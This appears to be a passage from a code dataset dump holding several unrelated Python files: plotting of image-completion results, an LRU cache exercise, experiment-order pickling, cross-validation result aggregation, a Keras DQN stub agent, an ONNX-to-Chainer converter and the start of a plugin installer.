scipy.io.loadmat('data/VideoData.mat')['Data'] \n\t\timage = np.asfortranarray(image).astype(float)\n\t\tim_size=image.shape\n\t\timage_reshaped = image.reshape(tensor_shape,order=order)\n\t\tindices,values,im_missing = extract_observed_entries(image_reshaped,missing_rate=0.9,is_color_image=False)\n\t\ttr_als_params = [np.sum(tensor_shape) * R**2 for R in [10,15,20,25,30]]\n\t\ttr_als_errors = [13.90, 10.12, 8.13, 6.88, 6.25]\n\n\t\ttt_als_params = [tt_parameters(tensor_shape,R) for R in [10,15,20,25,30]]\n\t\ttt_als_errors = [19.16, 14.83, 16.42, 16.86, 16.99]\n\n\n\n\n\tgreedy_errors = []\n\tgreedy_params = []\n\n\n\tsubplot_index = 1\n\tif xp=='einstein': #plot original and missing\n\t\tfig = plt.figure(**fig_args)\n\t\t\n\t\tplt.subplot(nploty,nplotx,subplot_index)\n\t\tsubplot_index += 1\n\t\tplt.imshow(image.reshape(im_size,order='F')/255)\n\t\tplt.axis('off')\n\t\tplt.title(f\"target image\",fontsize=fontsize)\n\t\tplt.subplot(nploty,nplotx,subplot_index)\n\t\tsubplot_index += 1\n\t\tplt.imshow(im_missing.reshape(im_size,order=order).astype(np.uint8))\n\t\tplt.axis('off')\n\t\tplt.title(f\"observed pixels\",fontsize=fontsize)\n\n\tfor fn in sys.argv[1:]:\n\t\twith open(fn,'rb') as f:\n\t\t\tresults = pickle.load(f)\n\n\n\t\t# losses = [loss for r in results[1:] for loss in r['train_loss_hist']]\n\t\t# plt.plot(range(len(losses)), losses)\n\t\t# plt.xlabel('epoch')\n\t\t# plt.ylabel('loss')\n\t\t# plt.legend(['greedy'])\n\t\t# #plt.title(fn)\n\t\t# plt.tight_layout()\n\n\n\t\tfor res in results[1:]:\n\n\t\t\tim = cc.wire_network(res['network'],give_dense=True).detach().numpy().reshape(im_size,order='F')\n\t\t\tparams=res['num_params']\n\t\t\terror=np.linalg.norm((image-im).ravel())/np.linalg.norm(image.ravel())*100\n\n\t\t\tgreedy_errors.append(error)\n\t\t\tgreedy_params.append(params)\n\t\t\tif len(greedy_params) > 1 and greedy_params[-1] == greedy_params[-2]:\n\t\t\t\tdel greedy_params[-2]\n\t\t\t\tdel greedy_errors[-2]\n\t\t\t\tsubplot_index -= 1\n\t\t\tif xp == 'einstein':\n\t\t\t\tplt.subplot(nploty,nplotx,subplot_index)\n\t\t\t\tsubplot_index += 1\n\t\t\t\tplt.imshow(im/255)\n\t\t\t\tplt.axis('off')\n\t\t\t\tplt.title(f\"Iter. {subplot_index-3} - {params} param.\\ntest error = {error:.2f}\\\\%\",fontsize=fontsize)\n\t\t\t\t#f\"Greedy-TL (iter={res_counter})\\n{params} param.\"\n\t\t\tprint(params,error)\n\t\t\t#plt.show()\n\t\t\n\tplt.tight_layout()\n\tplt.style.use('ggplot')\n\tplt.figure()\n\tplt.plot(greedy_params,greedy_errors,'o-',lw=lw,ms=ms)\n\tplt.plot(tr_als_params,tr_als_errors,'o-',lw=lw,ms=ms)\n\tplt.plot(tt_als_params,tt_als_errors,'o-',lw=lw,ms=ms)\n\tplt.legend(\"Greedy TR-ALS TT-ALS\".split())\n\tplt.xlabel(\"parameters\")\n\tplt.ylabel(\"relative error\")\n\tplt.title('Einstein Image Completion')\n\tplt.tight_layout()\n\t\n\tplt.show()","sub_path":"plot_results_completion.py","file_name":"plot_results_completion.py","file_ext":"py","file_size_in_byte":5148,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"360729944","text":"from collections import deque\n\ndef solution(cacheSize, cities):\n answer = 0\n\n queue = deque()\n for city in cities:\n if str(city).lower() in queue:\n answer += 1\n queue.remove(str(city).lower())\n queue.append(str(city).lower())\n else:\n answer += 5\n\n if cacheSize == 0:\n continue\n\n if len(queue) < cacheSize:\n queue.append(str(city).lower())\n else:\n queue.popleft()\n queue.append(str(city).lower())\n\n\n return answer\n\n# print(solution(3, [\"Jeju\", \"Pangyo\", \"Seoul\", \"NewYork\", \"LA\", \"Jeju\", \"Pangyo\", \"Seoul\", \"NewYork\", \"LA\"]))\nprint(solution(5, [\"Jeju\", \"Pangyo\", \"Seoul\", \"NewYork\", \"LA\", \"SanFrancisco\", \"Seoul\", \"Rome\", \"Paris\", \"Jeju\", \"NewYork\", \"Rome\"]))","sub_path":"프로그래머즈/[1차]캐시/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":821,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"539720164","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Jun 12 12:20:21 2014\nCreates pickle files necessary to run behav_gui.py.\n@author: tsalo\n\"\"\"\nimport pickle\nimport inspect\nimport os\n\ncode_dir = os.path.dirname(os.path.abspath(inspect.stack()[0][1]))\npar_dir = os.path.dirname(code_dir)\n\n## Pseudo-randomized order of versions of each task.\neach_order = {\"RISE\": [[['A'], ['A'], ['B'], ['B'], ['C'], ['C']],\n [['B'], ['C'], ['A'], ['C'], ['A'], ['B']],\n [['C'], ['B'], ['C'], ['A'], ['B'], ['A']]],\n \"AX\": [[['1']],\n [['1']],\n [['1']]],\n \"Kirby\": [[['1']],\n [['1']],\n [['1']]],\n \"Decimal\": [[['Messy first'], ['Rounded first']],\n [['Rounded first'], ['Messy first']],\n [['Messy first'], ['Rounded first']]],\n }\n\nwith open(code_dir + '/each_order.pickle', 'w') as file_:\n pickle.dump(each_order, file_)\n\n## Files associated with each task/task-version.\nfile_dict = {\"RISE\": {\"A\": {\"Part1\": par_dir + \"\\\\RISE1_2_7.2010\\RISE1_2_VersionA\\\\RISE1_2_PART1_VersionA.ebs2\",\n \"Part2\": par_dir + \"\\\\RISE1_2_7.2010\\RISE1_2_VersionA\\\\RISE1_2_PART2_VersionA.ebs2\",\n },\n \"B\": {\"Part1\": par_dir + \"\\\\RISE1_2_7.2010\\RISE1_2_VersionB\\\\RISE1_2_PART1_VersionB.ebs2\",\n \"Part2\": par_dir + \"\\\\RISE1_2_7.2010\\RISE1_2_VersionB\\\\RISE1_2_PART2_VersionB.ebs2\",\n },\n \"C\": {\"Part1\": par_dir + \"\\\\RISE1_2_7.2010\\RISE1_2_VersionC\\\\RISE1_2_PART1_VersionC.ebs2\",\n \"Part2\": par_dir + \"\\\\RISE1_2_7.2010\\RISE1_2_VersionC\\\\RISE1_2_PART2_VersionC.ebs2\",\n },\n },\n \"AX\": {\"1\": par_dir + \"\\\\AXCPT_CNTRACS\\\\EP2-AXCPT_rev3_6.24.14.ebs2\",\n },\n \"Kirby\": {\"1\": par_dir + \"\\\\DelayDiscount\\\\Kirby\\\\KirbyDiscounting_CarterEP2_v1.ebs2\",\n },\n \"Decimal\": {\"Messy first\": par_dir + \"\\\\DelayDiscount\\\\Decimal\\\\chooserewardSSB_Short_MessyFirst_CarterEP2_v2.ebs2\",\n \"Rounded first\": par_dir + \"\\\\DelayDiscount\\\\Decimal\\\\chooserewardSSB_Short_RoundedFirst_CarterEP2_v2.ebs2\",\n },\n }\n\nwith open(code_dir + '/file_dict.pickle', 'w') as file_:\n pickle.dump(file_dict, file_)\n\n## CSV files to log version used for a given subject/timepoint for each task.\ntask_info = {\"RISE\": {\"file\": code_dir + \"\\\\rise_trialsheet.csv\",\n \"col_beg\": [1, 2, 3],\n \"col_end\": [2, 3, 4],\n },\n \"AX\": {\"file\": code_dir + \"\\\\ax_trialsheet.csv\",\n \"col_beg\": [1, 2, 3],\n \"col_end\": [2, 3, 4]},\n \"Kirby\": {\"file\": code_dir + \"\\\\kirby_trialsheet.csv\",\n \"col_beg\": [1, 2, 3],\n \"col_end\": [2, 3, 4]},\n \"Decimal\": {\"file\": code_dir + \"\\\\decimal_trialsheet.csv\",\n \"col_beg\": [1, 2, 3],\n \"col_end\": [2, 3, 4]},\n }\n\nwith open(code_dir + '/task_info.pickle', 'w') as file_:\n pickle.dump(task_info, file_)\n\n## Pseudo-randomized order of tasks and legend for timepoints.\ntask_order = [[['AX', 'RISE', 'Kirby', 'Decimal'],\n ['AX', 'RISE', 'Decimal', 'Kirby'],\n ['AX', 'Kirby', 'RISE', 'Decimal'],\n ['AX', 'Kirby', 'Decimal', 'RISE'],\n ['AX', 'Decimal', 'RISE', 'Kirby'],\n ['AX', 'Decimal', 'Kirby', 'RISE'],\n ['RISE', 'AX', 'Kirby', 'Decimal'],\n ['RISE', 'AX', 'Decimal', 'Kirby'],\n ['RISE', 'Kirby', 'AX', 'Decimal'],\n ['RISE', 'Kirby', 'Decimal', 'AX'],\n ['RISE', 'Decimal', 'AX', 'Kirby'],\n ['RISE', 'Decimal', 'Kirby', 'AX'],\n ['Kirby', 'AX', 'RISE', 'Decimal'],\n ['Kirby', 'AX', 'Decimal', 'RISE'],\n ['Kirby', 'RISE', 'AX', 'Decimal'],\n ['Kirby', 'RISE', 'Decimal', 'AX'],\n ['Kirby', 'Decimal', 'AX', 'RISE'],\n ['Kirby', 'Decimal', 'RISE', 'AX'],\n ['Decimal', 'AX', 'RISE', 'Kirby'],\n ['Decimal', 'AX', 'Kirby', 'RISE'],\n ['Decimal', 'RISE', 'AX', 'Kirby'],\n ['Decimal', 'RISE', 'Kirby', 'AX'],\n ['Decimal', 'Kirby', 'AX', 'RISE'],\n ['Decimal', 'Kirby', 'RISE', 'AX']],\n [['RISE', 'AX', 'Kirby', 'Decimal'],\n ['RISE', 'AX', 'Decimal', 'Kirby'],\n ['RISE', 'Kirby', 'AX', 'Decimal'],\n ['RISE', 'Kirby', 'Decimal', 'AX'],\n ['RISE', 'Decimal', 'AX', 'Kirby'],\n ['RISE', 'Decimal', 'Kirby', 'AX'],\n ['Kirby', 'AX', 'RISE', 'Decimal'],\n ['Kirby', 'AX', 'Decimal', 'RISE'],\n ['Kirby', 'RISE', 'AX', 'Decimal'],\n ['Kirby', 'RISE', 'Decimal', 'AX'],\n ['Kirby', 'Decimal', 'AX', 'RISE'],\n ['Kirby', 'Decimal', 'RISE', 'AX'],\n ['Decimal', 'AX', 'RISE', 'Kirby'],\n ['Decimal', 'AX', 'Kirby', 'RISE'],\n ['Decimal', 'RISE', 'AX', 'Kirby'],\n ['Decimal', 'RISE', 'Kirby', 'AX'],\n ['Decimal', 'Kirby', 'AX', 'RISE'],\n ['Decimal', 'Kirby', 'RISE', 'AX'],\n ['AX', 'RISE', 'Kirby', 'Decimal'],\n ['AX', 'RISE', 'Decimal', 'Kirby'],\n ['AX', 'Kirby', 'RISE', 'Decimal'],\n ['AX', 'Kirby', 'Decimal', 'RISE'],\n ['AX', 'Decimal', 'RISE', 'Kirby'],\n ['AX', 'Decimal', 'Kirby', 'RISE']],\n [['Kirby', 'AX', 'RISE', 'Decimal'],\n ['Kirby', 'AX', 'Decimal', 'RISE'],\n ['Kirby', 'RISE', 'AX', 'Decimal'],\n ['Kirby', 'RISE', 'Decimal', 'AX'],\n ['Kirby', 'Decimal', 'AX', 'RISE'],\n ['Kirby', 'Decimal', 'RISE', 'AX'],\n ['Decimal', 'AX', 'RISE', 'Kirby'],\n ['Decimal', 'AX', 'Kirby', 'RISE'],\n ['Decimal', 'RISE', 'AX', 'Kirby'],\n ['Decimal', 'RISE', 'Kirby', 'AX'],\n ['Decimal', 'Kirby', 'AX', 'RISE'],\n ['Decimal', 'Kirby', 'RISE', 'AX'],\n ['AX', 'RISE', 'Kirby', 'Decimal'],\n ['AX', 'RISE', 'Decimal', 'Kirby'],\n ['AX', 'Kirby', 'RISE', 'Decimal'],\n ['AX', 'Kirby', 'Decimal', 'RISE'],\n ['AX', 'Decimal', 'RISE', 'Kirby'],\n ['AX', 'Decimal', 'Kirby', 'RISE'],\n ['RISE', 'AX', 'Kirby', 'Decimal'],\n ['RISE', 'AX', 'Decimal', 'Kirby'],\n ['RISE', 'Kirby', 'AX', 'Decimal'],\n ['RISE', 'Kirby', 'Decimal', 'AX'],\n ['RISE', 'Decimal', 'AX', 'Kirby'],\n ['RISE', 'Decimal', 'Kirby', 'AX']]]\n\ntp_dict = {\"1- 00 Month\": 0,\n \"3- 12 Month\": 1,\n \"4- 24 Month\": 2,\n }\n\ncol_beg = [1, 5, 9]\ncol_end = [5, 9, 13]\n\nwith open(code_dir + '/task_order.pickle', 'w') as file_:\n pickle.dump([task_order, tp_dict, col_beg, col_end], file_)\n","sub_path":"behav-gui/behav_order.py","file_name":"behav_order.py","file_ext":"py","file_size_in_byte":7348,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"49672669","text":"import itertools\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom scipy import interp\nfrom sklearn.metrics import roc_curve, auc\n\npath_upwards = '../../'\nimport sys\nsys.path.extend([path_upwards + '../TailingDamDetection/'])\n\nimport config\nfrom utils.ml_functions import compute_confusion_matrix\nfrom utils.utils_input_output import read_label_dictionary\nfrom utils.utils_plots import plot_confusion_matrix_with_confidence\n\n\nexperiment_name = 'two_classes_cv_10_folds'\n\npath_to_data = path_upwards + config.data_path + config.experiment_data + experiment_name + '/'\npath_to_results = path_upwards + config.result_path + config.experiment_data + experiment_name + '/'\n\nn_runs = 10\nn_epoch = 40\nn_classes = 2\n\nlabel_dictionary = read_label_dictionary(path_to_data + \"label_dictionary.txt\")\nclass_codes = np.arange(n_classes)\nclass_labels = [label_dictionary[code] for code in class_codes]\n\nall_train_accuracy = np.zeros((n_runs, n_epoch), dtype=np.float64)\nall_test_accuracy = np.zeros((n_runs, n_epoch), dtype=np.float64)\nall_test_cm = np.zeros((n_runs, n_classes, n_classes), dtype=np.float64)\nall_test_auc = np.zeros((n_runs,), dtype=np.float64)\n\ntprs = []\nmean_fpr = np.linspace(0, 1, 100)\n\nfor run in range(n_runs):\n cur_results = np.load(path_to_results + 'results_{}_run.npz'.format(run))\n cur_data = np.load(path_to_data + 'train_test_data_{}.npz'.format(run))\n\n all_train_accuracy[run] = cur_results['train_accuracy']\n all_test_accuracy[run] = cur_results['test_accuracy']\n\n all_test_cm[run] = compute_confusion_matrix(np.argmax(cur_data['test_labels'], axis=1),\n np.argmax(cur_results['test_predicted_probs'], axis=1),\n normalise=True)\n\n # Compute ROC curve and area the curve\n fpr, tpr, thresholds = roc_curve(np.argmax(cur_data['test_labels'], axis=1),\n cur_results['test_predicted_probs'][:, 1])\n tprs.append(interp(mean_fpr, fpr, tpr))\n tprs[-1][0] = 0.0\n all_test_auc[run] = auc(fpr, tpr)\n\n\nmean_train_accuracy = np.mean(all_train_accuracy, axis=0)\nmean_test_accuracy = np.mean(all_test_accuracy, axis=0)\nmean_test_cm = np.mean(all_test_cm, axis=0)\nmean_test_auc = np.mean(all_test_auc)\n\nstd_train_accuracy = np.std(all_train_accuracy, axis=0)\nstd_test_accuracy = np.std(all_test_accuracy, axis=0)\nstd_test_cm = np.std(all_test_cm, axis=0)\nstd_test_auc = np.std(all_test_auc)\n\nx = np.arange(n_epoch)\n\nfig, ax = plt.subplots()\nplt.plot(x, mean_train_accuracy, 'r--', linewidth=2.0, label='train')\nax.fill_between(x,\n np.maximum(mean_train_accuracy - std_train_accuracy, np.zeros((n_epoch,), dtype=np.float64)),\n np.minimum(mean_train_accuracy + std_train_accuracy, np.ones((n_epoch,), dtype=np.float64)),\n facecolor='r', alpha=0.1)\n\nplt.plot(x, mean_test_accuracy, 'b-', linewidth=2.0, label='test')\nax.fill_between(x,\n np.maximum(mean_test_accuracy - std_test_accuracy, np.zeros((n_epoch,), dtype=np.float64)),\n np.minimum(mean_test_accuracy + std_test_accuracy, np.ones((n_epoch,), dtype=np.float64)),\n facecolor='b', alpha=0.2)\nplt.legend()\nplt.savefig(path_to_results + 'joint_accuracy_plots.pdf', format='pdf')\nplt.show()\n\n\nplot_confusion_matrix_with_confidence(mean_test_cm, std_test_cm,\n classes=class_labels, title='Confusion matrix on test')\nplt.savefig(path_to_results + 'joint_cm_plot.pdf', format='pdf')\nplt.show()\n\n# roc-curves\nmean_tpr = np.mean(tprs, axis=0)\nmean_tpr[-1] = 1.0\nmean_auc = auc(mean_fpr, mean_tpr)\nplt.plot(mean_fpr, mean_tpr, color='b',\n linewidth=2)\n\nstd_tpr = np.std(tprs, axis=0)\ntprs_upper = np.minimum(mean_tpr + std_tpr, 1)\ntprs_lower = np.maximum(mean_tpr - std_tpr, 0)\nplt.fill_between(mean_fpr, tprs_lower, tprs_upper, color='blue', alpha=.2)\nplt.title('ROC curve')\nplt.savefig(path_to_results + 'joint_roc_curve.pdf', format='pdf')\nplt.show()\n","sub_path":"dam_recognition/two_classes_cv_from_scratch/process_results.py","file_name":"process_results.py","file_ext":"py","file_size_in_byte":3999,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"433153243","text":"import random\nimport numpy as np\nfrom collections import deque\nfrom keras.layers import Dense, Input, Conv2D, Conv3D, Conv1D, MaxPool2D, MaxPool1D,\\\n concatenate, Flatten, Lambda, CuDNNLSTM, Reshape, Activation, Dropout, BatchNormalization\nfrom keras.optimizers import Adam, SGD\nfrom keras.regularizers import l1, l2, l1_l2\nfrom keras.models import Sequential, Model\nfrom keras.backend import int_shape, expand_dims\nfrom monlan.agents.ResnetBuilder import *\n\n# DQN Agent for the Cartpole\n# it uses Neural Network to approximate q function\n# and replay memory & target q network\nclass StubAgent:\n def __init__(self, state_size, action_size,\n discount_factor = 0.99,\n learning_rate = 0.001,\n epsilon = 1.0,\n epsilon_decay = 0.9999,\n epsilon_min = 0.01,\n batch_size = 64,\n train_start = 1500,\n memorySize = 2000):\n # if you want to see Cartpole learning, then change to True\n self.render = False\n self.load_model = False\n\n # get size of state and action\n self.state_size = state_size\n self.action_size = action_size\n\n # These are hyper parameters for the DQN\n self.discount_factor = discount_factor\n self.learning_rate = learning_rate\n self.epsilon = epsilon\n self.epsilon_decay = epsilon_decay\n self.epsilon_min = epsilon_min\n self.batch_size = batch_size\n self.train_start = train_start\n # create replay memory using deque\n self.memory = deque(maxlen=memorySize)\n self.memorySize = memorySize\n\n # create main model and target model\n self.model = self.build_model()\n #self.target_model = self.build_model()\n\n # initialize target model\n #self.update_target_model()\n\n # approximate Q function using Neural Network\n # state is input and Q Value of each action is output of network\n def build_model(self):\n\n model = None\n stateLen = len(self.state_size)\n if stateLen == 1:\n model = self.buildFlatModel()\n elif stateLen == 2:\n model = self.buildSimpleConvModel()\n elif stateLen == 3:\n model = self.buildHierarhicalConvModel()\n\n return model\n\n def buildFlatModel(self):\n model = Sequential()\n model.add(Dense(1, input_dim=self.state_size[0], activation='relu',\n kernel_initializer='glorot_uniform'))\n #model.summary()\n model.compile(loss='mse', optimizer=Adam(lr=self.learning_rate))\n return model\n\n def buildSimpleConvModel(self):\n mainInputShape = (self.state_size[0], self.state_size[1], 1)\n mainInput = Input(shape=mainInputShape)\n headModel = Conv2D(filters=1, kernel_size=2, strides=(1, 1), padding=\"same\", activation=\"relu\")(mainInput)\n headModel = Flatten()(headModel)\n bodyModel = Dense(self.action_size, activation=\"tanh\")(headModel)\n model = Model(inputs=mainInput, outputs=bodyModel)\n model.summary()\n model.compile(loss='mse', optimizer=Adam(lr=self.learning_rate))\n\n return model\n\n def buildHierarhicalConvModel(self):\n\n headModels = []\n mainInputShape = ( self.state_size[0], self.state_size[1], self.state_size[2], 1)\n mainInput = Input(shape=mainInputShape)\n #split = Lambda(lambda x: tf.split(x, num_or_size_splits=self.state_size[0], axis=1))(mainInput)\n #y = Lambda(lambda x: x[:, 0, :, :], output_shape=(1,) + mainInputShape[2:])(mainInput)\n for i in range( self.state_size[0] ):\n #y = Lambda(lambda x: x[:, 0, :, :], output_shape=(1,) + mainInputShape[2:])(mainInput)\n #headModelInput = Input( shape=(self.state_size[1], self.state_size[2], 1) )(split[i])\n #headModel = Conv2D(filters=64, kernel_size=4, padding=\"same\", activation=\"relu\")(split[i])\n headModelInput = Lambda(lambda x: x[:, i, :, :], mainInputShape[1:])(mainInput)\n #headModelInput = Input(shape=(self.state_size[1], self.state_size[2], 1))(headModelInput)\n #headModelInput._keras_shape = (None, headModelInput.keras_shape[2], headModelInput.keras_shape[3], headModelInput.keras_shape[4] )\n headModel = Conv2D(filters=32, kernel_size=8, strides=(4, 4), padding=\"same\",\n activation=\"elu\")(headModelInput)\n #headModel = BatchNormalization()(headModel)\n #headModel = Dropout(0.05)(headModel)\n #headModel = MaxPool2D(pool_size=(2, 2), padding=\"same\")(headModel)\n headModel = Conv2D( filters=64, kernel_size=4, strides=(2, 2), padding=\"same\",\n activation=\"elu\")(headModel)\n #headModel = BatchNormalization()(headModel)\n #headModel = Dropout(0.2)(headModel)\n #headModel = MaxPool2D(pool_size=(2, 2), padding=\"same\")(headModel)\n headModel = Conv2D(filters=64, kernel_size=3, strides=(1, 1), padding=\"same\",\n activation=\"elu\")(headModel)\n #headModel = BatchNormalization()(headModel)\n #headModel = Dropout(0.2)(headModel)\n # headModel = MaxPool2D(pool_size=(2, 2), padding=\"same\")(headModel)\n ###############################\n \"\"\"headModel = Reshape((headModel._keras_shape[1] * headModel._keras_shape[2], headModel._keras_shape[3]))(headModel)\n headModel._keras_shape = (None, headModel._keras_shape[1], headModel._keras_shape[2])\n # bodyModel = Activation(activation=\"linear\")(bodyModel)\n headModel = CuDNNLSTM(128)(headModel)\n headModel = Reshape((1, headModel._keras_shape[1]))(headModel)\"\"\"\n ###############################\n #headModel = Model(inputs=headModelInput, outputs=headModel)\n headModel = Reshape((1,int_shape(headModel)[1],\n int_shape(headModel)[2],\n int_shape(headModel)[3]))(headModel)\n #print(headModel.shape)\n headModels.append(headModel)\n\n #try to change axis of concatenation\n mergedHead = concatenate( [head for head in headModels], axis=1 )\n #print(mergedHead.shape)\n #######\n #mergedHead = Reshape((1, mergedHead._keras_shape[1], mergedHead._keras_shape[2]))(mergedHead)\n #######\n #mergedHead = expand_dims(mergedHead, axis=-1)\n featLen = int_shape(mergedHead)[1]\n rowLen = int_shape(mergedHead)[2] * int_shape(mergedHead)[3]\n w2vLen = int_shape(mergedHead)[4]\n #filterLen = int_shape(mergedHead)[3]\n #mergedHead._keras_shape = (None, mergedHead.shape[1].value, int_shape(mergedHead)[2], int_shape(mergedHead)[3])\n mergedHead = Reshape((featLen,\n rowLen,\n w2vLen, 1))(mergedHead)\n #######\n\n #try conv3d at top of head features\n # try conv1d at low levels\n #print(mergedHead.shape)\n featTypes = self.state_size[0]\n bodyModel = Conv3D(filters=32, kernel_size=8, strides=(1, 4, 4), padding=\"same\",\n activation=\"elu\")(mergedHead)\n #bodyModel = BatchNormalization()(bodyModel)\n #bodyModel = Dropout(0.05)(bodyModel)\n #bodyModel = MaxPool2D(pool_size=(2, 2), padding=\"same\")(bodyModel)\n bodyModel = Conv3D(filters=64, kernel_size=4, strides=(1, 2, 2), padding=\"same\",\n activation=\"elu\")(bodyModel)\n #bodyModel = BatchNormalization()(bodyModel)\n #bodyModel = Dropout(0.2)(bodyModel)\n #bodyModel = MaxPool2D(pool_size=(2, 2), padding=\"same\")(bodyModel)\n bodyModel = Conv3D(filters=64, kernel_size=3, strides=(1, 1, 1), padding=\"same\",\n activation=\"elu\")(bodyModel)\n #bodyModel = BatchNormalization()(bodyModel)\n #bodyModel = Dropout(0.2)(bodyModel)\n #bodyModel = MaxPool2D(pool_size=(2, 2), padding=\"same\")(bodyModel)\n\n #####################################################\n #bodyModel = Reshape((bodyModel.shape[1] * bodyModel.shape[2], bodyModel.shape[3] * bodyModel.shape[4]))(bodyModel)\n #bodyModel._keras_shape = (None, bodyModel._keras_shape[1].value, bodyModel._keras_shape[2].value)\n #bodyModel = CuDNNLSTM(512, return_sequences=False)(bodyModel)\n ####################################################\n #bodyModel = CuDNNLSTM( 512, return_sequences=True )(bodyModel)\n #bodyModel = SeqSelfAttention()(bodyModel)\n ####################################################\n\n bodyModel = Flatten()(bodyModel)\n bodyModel = Dense( self.action_size, activation=\"linear\" )(bodyModel)\n model = Model(inputs=mainInput, outputs=bodyModel)\n model.summary()\n model.compile(loss='mse', optimizer=Adam(lr=self.learning_rate))\n return model\n\n def fit_agent(self, env, nEpisodes, plotScores, saveFreq=5):\n pass\n\n def use_agent(self, env):\n self.epsilon = 0\n done = False\n score = 0\n state = env.reset()\n #state = np.reshape(state, [1, self.state_size])\n while not done:\n # get action for the current state and go one step in environment\n action = self.get_action(state)\n next_state, reward, done, info = env.step(action)\n #next_state = np.reshape(next_state, [1, self.state_size])\n score += reward\n state = next_state\n if done:\n # every episode update the target model to be same with model\n print(\"{}: \".format(env.iStep) + str(env.deposit))\n print(\"score:\", score)\n pass\n\n def save_agent(self, path, name):\n #import joblib\n #with open(path + \"/\" + name + \".pkl\", mode=\"wb\") as agentFile:\n # joblib.dump(self, agentFile)\n\n #self.model.save( path + name + \"main_model\" )\n #self.target_model.save(path + name + \"sup_model\")\n self.model.save_weights( path + name + \"_main_model\" + \".h5\")\n #self.target_model.save_weights(path + name + \"_sup_model\" + \".h5\")\n\n tmp_1 = self.model\n #tmp_2 = self.target_model\n self.model = None\n #self.target_model = None\n import joblib\n with open(path + \"/\" + name + \".pkl\", mode=\"wb\") as agentFile:\n joblib.dump(self, agentFile)\n self.model = tmp_1\n #self.target_model = tmp_2\n\n pass\n\n def load_agent(self, path, name, dropSupportModel = False):\n import joblib\n loadedAgent = None\n with open(path + \"/\" + name + \".pkl\", mode=\"rb\") as agentFile:\n loadedAgent = joblib.load(agentFile)\n\n self.model = None\n #self.target_model = None\n loadedAgent.model = loadedAgent.build_model()\n #if dropSupportModel == False:\n #loadedAgent.target_model = loadedAgent.build_model()\n #loadedAgent.update_target_model()\n\n loadedAgent.model.load_weights(path + name + \"_main_model\" + \".h5\")\n #if dropSupportModel == False:\n # loadedAgent.target_model.load_weights(path + name + \"_sup_model\" + \".h5\")\n\n return loadedAgent\n #pass\n\n # after some time interval update the target model to be same with model\n def update_target_model(self):\n #self.target_model.set_weights(self.model.get_weights())\n pass\n\n # get action from model using epsilon-greedy policy\n def get_action(self, state):\n return 0\n\n # save sample to the replay memory\n def append_sample(self, state, action, reward, next_state, done):\n pass\n\n # pick samples randomly from replay memory (with batch_size)\n def train_model(self):\n pass","sub_path":"monlan/agents/StubAgent.py","file_name":"StubAgent.py","file_ext":"py","file_size_in_byte":11745,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"359678915","text":"import onnx\nimport numpy as np\nimport chainer\nimport chainer.functions as F\nimport chainer.links as L\nfrom functools import reduce\nif chainer.cuda.available:\n import cupy as cp\n\nimport onnx2chainer.util\nfrom onnx2chainer.util import which\nfrom onnx2chainer import functions\n\ndef onnxToChainer(o, gpu=None, printTensorStack=False):\n graph = o.graph\n\n params = {}\n for i in graph.initializer:\n dtype = onnx2chainer.util.elemTypeToNumpy(i.data_type)\n if len(i.raw_data) > 0:\n d = np.frombuffer(i.raw_data, dtype=dtype)\n\n elif len(i.float_data) > 0:\n d = np.array(i.float_data, dtype=dtype)\n\n elif len(i.int64_data) > 0:\n d = np.array(i.int64_data, dtype=dtype)\n\n else:\n assert False\n\n params[i.name] = d.reshape(i.dims)\n\n class DecodedChain(chainer.Chain):\n def __init__(self, graph, params):\n super(DecodedChain, self).__init__()\n self.nodes = []\n for i, op in enumerate(graph.node):\n cop = onnxNodeToChainer(op, params)\n if gpu is not None and hasattr(cop, \"to_gpu\"):\n cop.to_gpu()\n\n self.nodes.append((cop, op.input, op.output))\n with self.init_scope():\n setattr(self, \"node_{}\".format(i), cop)\n\n self.paramNames = params.keys()\n\n nodeInputNames = set(reduce(lambda a,b: a+b,\n map(lambda x: list(x[1]), self.nodes)))\n nodeOutputNames = set(reduce(lambda a,b: a+b,\n map(lambda x: list(x[2]), self.nodes)))\n\n self.modelInputNames = nodeInputNames - nodeOutputNames - set(self.paramNames)\n\n def forward(self, arg):\n tensors = {}\n\n if isinstance(arg, dict):\n for k,v in arg.items():\n tensors[k] = v\n\n else:\n assert len(self.modelInputNames == 1)\n tensors[self.modelInputNames[0]] = arg\n\n for op, iNames, oNames in self.nodes:\n inputs = list(map(lambda x: tensors[x],\n filter(lambda y: not y in self.paramNames, iNames))) # Ignore params. from parse_*'s arguments\n\n if isinstance(inputs, self.xp.ndarray):\n inputs = inputs[0]\n\n if printTensorStack:\n print(op)\n for k in tensors.keys():\n print(\"{} {}\".format(k, tensors[k].shape if tensors[k] is not None else None))\n\n print(\"-- {} -> {} --\".format(iNames, oNames))\n\n outputs = op(*inputs)\n if isinstance(outputs, chainer.Variable):\n assert len(oNames) == 1\n outputs = [outputs]\n\n for i, oName in enumerate(oNames):\n tensors[oName] = outputs[i]\n\n return outputs\n\n return DecodedChain(graph, params)\n\ndef onnxNodeToChainer(op, ginits):\n opType = op.op_type\n\n inits = []\n for iName in op.input:\n if iName in ginits.keys():\n inits.append(ginits[iName])\n\n converterName = \"parse_{}\".format(opType)\n if not hasattr(functions, converterName):\n print(onnx2chainer.util.printONNX2ChainerWarning(\"op_type \\\"{}\\\" is not supported.\".format(opType)))\n exit()\n\n return getattr(functions, converterName)(op, inits)\n","sub_path":"onnx2chainer/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":3465,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"293919075","text":"#coding:utf-8\n\"\"\"\nCreated on 15.10.13\n\n@author: kasimova\n\"\"\"\nfrom abc import ABCMeta, abstractmethod\nimport os\nimport shutil\n\nfrom helpers import method_check_arg\nfrom plugin import Plugin\nfrom exceptions import MPException\n\nclass Installer(object):\n \"\"\"\n Интерфейс отвечающий за инсталяцию/деинсталяцию плагина,\n включение/выключение\n \"\"\"\n __metaclass__ = ABCMeta\n # Имена скриптов котрые будем 